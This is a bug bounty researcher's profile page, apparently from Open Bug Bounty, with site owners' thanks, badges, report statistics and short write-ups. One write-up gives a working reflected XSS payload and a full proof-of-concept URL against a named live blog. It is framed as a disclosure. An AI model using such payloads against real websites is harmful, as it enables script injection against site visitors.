Researcher reputation:  1230

Real name:
TAHA SMILY

About me:
Our Democracy has been Hacked ! F**K society

How to contact me:
this is my email adresse : [email protected]

Alternative Contacts:
https://www.linkedin.com/in/taha-smily-195aa3145/

Experience in Application Security
3-5 years

Award / Bug Bounty I prefer:
I prefer :
- Rewards
- Benefits Gifts
- Swag
- Hall of Fame
- Acknowledgment
- PayPal Money


Anything that you wish to award me will motivate me to continue doing what I'm doing

Follow me on:
Twitter
LinkedIn

Recommendations and Acknowledgements

    6 December, 2019

     Buchabstauber OJS Team from UNIVIE:

We would like to thank you for your valuable contribution in finding the XSS issue on our site! You have been very helpful!

    3 December, 2019

     ziduniwien Zentraler Informatikdienst from University of Vienna:

Dear ELProfesor, The University of Vienna would like to thank you for your valuable contribution in finding a website security issue. Your input is highly welcome and helps to raise the security level of our educational institution. Servus and greetings from Vienna, Austria.

    21 November, 2019

     nomuthetart nab8 from [email protected]:

Very responsive and provided clear information about what they had found.

    11 November, 2019

     fislerdata fislerdata from fislerdata:

Thank you for the assistance. Clearly stated issue, clear report. Thank you for your work

    28 October, 2019

     BDUe_Fachverlag Nadine from BDÜ Fachverlag:

Helpful information and report. We appreciate the quick feedback. Thanks!

    1 October, 2019

     r_c_claxton Richard :

Thank you for identifying a vulnerability on our site!

    20 September, 2019

     ashleyhindle Ashley from C&C:

Thank you so much for highlighting the vulnerability, it really helped!

    11 September, 2019

     ziduniwien Computer Center from University of Vienna:

Dear ELProfesor, The University of Vienna would like to thank you for your valuable contribution in finding a website security issue. Your input is highly welcome and helps to raise the security level of our educational institution. Servus and greetings from Vienna, Austria.

    10 September, 2019

     JamieForster JamieEff :

Thank you so much for highlighting the vulnerability - you're doing an amazing job!

    7 September, 2019

     dusalnet Blogmn.net from Blogmn.net:

Thank you for identifying the XSS issue on my site! You have been very helpful!

Shows the first 10 recommendations. See all.

Honor Badges

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Total reports:	7433
Total reports on VIP sites:	1605
Total patched vulnerabilities:	2260
Total vulnerabilities on Hold (Open Bug Bounty):	1025
Recommendations received:	82
Active since:	12.10.2017
Top VIP Security Researcher Awards:	Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week

Open Bug Bounty Certificate

27.11.2019  Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x"><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x"><svG onLoad=prompt(document.domain)>

Regards,

TAHA

21.11.2019  blind xss in apple

This is my report about blind xss in apple via user agent